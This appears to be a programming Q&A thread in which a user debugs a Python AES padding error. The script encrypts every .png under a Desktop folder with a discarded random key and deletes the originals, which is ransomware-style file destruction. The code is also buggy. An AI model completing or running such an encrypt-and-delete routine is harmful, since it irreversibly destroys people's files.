# Input strings must be a multiple of 16 in length ( i have done the padding )

Tags: python, aes

```
import os,sys,ctypes,struct,random
from getpass import *
from Crypto.Cipher import AES
from Crypto import Random

user = getuser()
extensions = ('.png')
paths = ['C:\\Users\\' + user + '\\Desktop\\Test']
Key = Random.new().read(AES.block_size)

def encryption ( Key,in_filename , out_filename=None , chuncksize =64*1024):
    if not out_filename:
        out_filename = in_filename + '.wbi'
    IV = Random.new().read(AES.block_size)
    encryptor = AES.new(Key,AES.MODE_CBC, IV)
    filesize = os.path.getsize(in_filename)

    with open (in_filename,'r', errors='ignore') as infile:
        with open (out_filename,'wb') as outfile:
            outfile.write(struct.pack('<Q', filesize))
            outfile.write(IV)
            while True:
                chunck = infile.read(chuncksize)
                if (len(chunck)==0):
                    break
                elif (len(chunck)%16!=0):

                    chunck+= ' ' * (16-len(chunck)%16)
                    #chunck+= ' '*(16-len(chunck)%16)
                    outfile.write(encryptor.encrypt(chunck))

def file_enc ():
    for path in paths:
        for root,dirs,files in os.walk(path):
            for file in files:
                if(file.endswith(extensions)):
                    encryption(Key, os.path.join(root,file))
                    os.remove(os.path.join(root,file))


file_enc ()
```

1. OUTPUT :   return self._cipher.encrypt(plaintext) 
   ValueError: Input
   strings must be a multiple of 16 in length

i have done the padding as u can see here :

```
elif (len(chunck)%16!=0):

                    chunck+= ' ' * (16-len(chunck)%16)
```

Traceback:

```
Traceback (most recent call last):
  File "C:\Users\Im Root Bicthes\Desktop\aes encryption done right.py", line 41, in <module>
    file_enc ()
  File "C:\Users\Im Root Bicthes\Desktop\aes encryption done right.py", line 37, in file_enc
    encryption(Key, os.path.join(root,file))
  File "C:\Users\Im Root Bicthes\Desktop\aes encryption done right.py", line 30, in encryption
    outfile.write(encryptor.encrypt(chunck))
  File "C:\Python32\lib\site-packages\Crypto\Cipher\blockalgo.py", line 244, in encrypt
    return self._cipher.encrypt(plaintext)
ValueError: Input strings must be a multiple of 16 in length
```

but still i dont know how to fix it any help will be appreciated

using python 3.2.5

Comment: please reformat your code and errors properly and give a bit more of context.

Comment: Provide the full traceback, not just the error message alone; the traceback is needed to show where the problem is in *your* code.

Comment: Side-note: If this is Python 3, you shouldn't be reading your file in text mode. The encryptor should either explode (expecting `bytes`) or it might seamlessly encode the text, but if it encodes it in a variable width encoding like UTF-8, you might end up with a multiple of 16 growing to a non-multiple. Work with raw `bytes` at all times, not `str`.

Comment: On checking the source code where it's going wrong, I'm more sure that passing `str` to the API is wrong. You need to pass `bytes`, so open your file in `'rb'` mode, pad with `b' '`, not `' '`, etc.

Comment: Another side note: Using AES in CBC mode with no MAC is not "encryption done right". Please see: https://en.wikipedia.org/wiki/Authenticated_encryption